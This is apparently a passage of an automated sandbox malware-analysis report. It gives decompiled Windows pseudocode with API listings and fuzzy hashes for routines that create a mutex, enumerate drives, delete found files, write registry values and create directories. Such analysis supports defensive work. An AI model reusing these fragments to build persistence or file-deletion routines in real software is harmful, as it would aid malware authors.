                                                                                                                          					E00407080(0x4091c8, 0x14, 0x14);
                                                                                                                          					_t17 = E00404018(0, 0, 0x4091c8); // executed
                                                                                                                          					_t44 = _t17;
                                                                                                                          					if(GetLastError() != 0xb7) {
                                                                                                                          						E00406D40( &_v8, __ebx, _t44, __esi); // executed
                                                                                                                          						_t32 = E0040320C(_v8);
                                                                                                                          						_t53 = _t32;
                                                                                                                          						if(_t32 > 0) {
                                                                                                                          							_t46 = 1;
                                                                                                                          							do {
                                                                                                                          								E004031B4();
                                                                                                                          								_t40 = 0x407674;
                                                                                                                          								E00403214( &_v12, 0x407674);
                                                                                                                          								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
                                                                                                                          								_pop(0x14);
                                                                                                                          								_t46 = _t46 + 1;
                                                                                                                          								_t32 = _t32 - 1;
                                                                                                                          								_t54 = _t32;
                                                                                                                          							} while (_t32 != 0);
                                                                                                                          						}
                                                                                                                          						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
                                                                                                                          						ReleaseMutex(_t44);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_pop(_t38);
                                                                                                                          				 *[fs:eax] = _t38;
                                                                                                                          				_push(E00407663);
                                                                                                                          				return E004030B8( &_v12, 2);
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 676290295-0
                                                                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004012A0(void* __eax, void** __edx) {
                                                                                                                          				void* _t3;
                                                                                                                          				void** _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				long _t14;
                                                                                                                          
                                                                                                                          				_t8 = __edx;
                                                                                                                          				if(__eax >= 0x100000) {
                                                                                                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                          				} else {
                                                                                                                          					_t14 = 0x100000;
                                                                                                                          				}
                                                                                                                          				_t8[1] = _t14;
                                                                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                          				_t11 = _t3;
                                                                                                                          				 *_t8 = _t11;
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					_t3 = E00401154(0x40a5d4, _t8);
                                                                                                                          					if(_t3 == 0) {
                                                                                                                          						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                          						 *_t8 = 0;
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2087232378-0
                                                                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 45%
                                                                                                                          			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				void* _t22;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t39;
                                                                                                                          				intOrPtr _t41;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_t30 = __eax;
                                                                                                                          				_push(_t46);
                                                                                                                          				_push(0x405291);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t46;
                                                                                                                          				E00404ED0(__eax,  &_v16);
                                                                                                                          				_push(_v16);
                                                                                                                          				E00404EEC( &_v20);
                                                                                                                          				_pop(_t39); // executed
                                                                                                                          				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
                                                                                                                          				_t31 = 1;
                                                                                                                          				while(_v8 != 0) {
                                                                                                                          					E00404798( &_v8,  &_v12, E004052A8);
                                                                                                                          					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
                                                                                                                          						_t22 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t22 = 1;
                                                                                                                          					}
                                                                                                                          					_t31 = _t22;
                                                                                                                          				}
                                                                                                                          				_pop(_t41);
                                                                                                                          				 *[fs:eax] = _t41;
                                                                                                                          				_push(E00405298);
                                                                                                                          				return E004030B8( &_v20, 4);
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                                                                            • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$CloseDeleteFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3969940835-0
                                                                                                                          • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                                                                          • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                                                                                          • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                                                                          • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040578C(void* __eax, void* __ecx, void* __edx) {
                                                                                                                          				void* _t4;
                                                                                                                          				char* _t7;
                                                                                                                          				long _t10;
                                                                                                                          				void* _t12;
                                                                                                                          
                                                                                                                          				_t12 = __eax;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					L2:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t4 = E0040320C(__ecx);
                                                                                                                          				_t7 = E0040340C(__ecx);
                                                                                                                          				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
                                                                                                                          				if(_t10 == 0) {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          				goto L2;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3702945584-0
                                                                                                                          • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                                                                          • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                                                                                          • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                                                                          • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
                                                                                                                          				char* _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t16;
                                                                                                                          
                                                                                                                          				_t16 = __ecx;
                                                                                                                          				_t11 = __eax;
                                                                                                                          				E004064E4(__eax);
                                                                                                                          				_t6 = E0040340C(__edx);
                                                                                                                          				_t7 =  *0x40a650; // 0x400000
                                                                                                                          				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
                                                                                                                          				if(_t8 > 1) {
                                                                                                                          					return E00406520(_t11, _t8);
                                                                                                                          				}
                                                                                                                          				return _t8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2619871307-0
                                                                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040575C(void* __eax, void* __ecx, void* __edx) {
                                                                                                                          				long _t4;
                                                                                                                          				void* _t7;
                                                                                                                          				void** _t12;
                                                                                                                          
                                                                                                                          				_t7 = __eax;
                                                                                                                          				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
                                                                                                                          				if(_t4 != 0) {
                                                                                                                          					 *_t12 = 0;
                                                                                                                          				}
                                                                                                                          				return  *_t12;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                                                                          • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                                                                                          • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                                                                          • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F34(void* __eax, void* __edx) {
                                                                                                                          				char _v268;
                                                                                                                          				long _t6;
                                                                                                                          				void* _t13;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
                                                                                                                          				return E00403184(_t13, _t6, _t14);
                                                                                                                          			}







                                                                                                                          0x00404f3c
                                                                                                                          0x00404f52
                                                                                                                          0x00404f6a

                                                                                                                          APIs
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00404F52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: NamePathShort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295925010-0
                                                                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
                                                                                                                          				CHAR* _t1;
                                                                                                                          				void* _t2;
                                                                                                                          				long _t6;
                                                                                                                          				long _t9;
                                                                                                                          
                                                                                                                          				_t9 = __edx;
                                                                                                                          				_t1 = __eax;
                                                                                                                          				_push(0);
                                                                                                                          				_t6 = __edx >> 0x00000010 & 0x00001fff;
                                                                                                                          				if(_t6 == 0) {
                                                                                                                          					_t6 = 0x80;
                                                                                                                          				}
                                                                                                                          				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                                                                          				void* _t8;
                                                                                                                          
                                                                                                                          				_t4 = _a12;
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                                                                          				return _t8;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMutex
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1964310414-0
                                                                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00404EB0(void* __eax) {
                                                                                                                          				int _t4;
                                                                                                                          
                                                                                                                          				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				return _t4 + 1;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectory
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4241100979-0
                                                                                                                          • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                                                                          • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                                                                                          • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                                                                          • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B9C() {
                                                                                                                          				void* _t3;
                                                                                                                          				long _t5;
                                                                                                                          				void* _t6;
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
                                                                                                                          				_t6 = _t5 + 1;
                                                                                                                          				_t10 = _t6;
                                                                                                                          				if(_t10 != 0) {
                                                                                                                          					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                                                                          • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404CF8(CHAR* __eax) {
                                                                                                                          				long _t4;
                                                                                                                          				void* _t5;
                                                                                                                          				void* _t9;
                                                                                                                          
                                                                                                                          				_t4 = GetFileAttributesA(__eax); // executed
                                                                                                                          				_t5 = _t4 + 1;
                                                                                                                          				_t9 = _t5;
                                                                                                                          				if(_t9 != 0) {
                                                                                                                          					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
                                                                                                                          				}
                                                                                                                          				return _t5;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                                                                          • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                                                                                          • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                                                                          • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004057CC(void* __eax) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				if(__eax != 0) {
                                                                                                                          					_t2 = RegCloseKey(__eax); // executed
                                                                                                                          					return _t2;
                                                                                                                          				}
                                                                                                                          				return __eax;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00407AA9,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 004057D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%
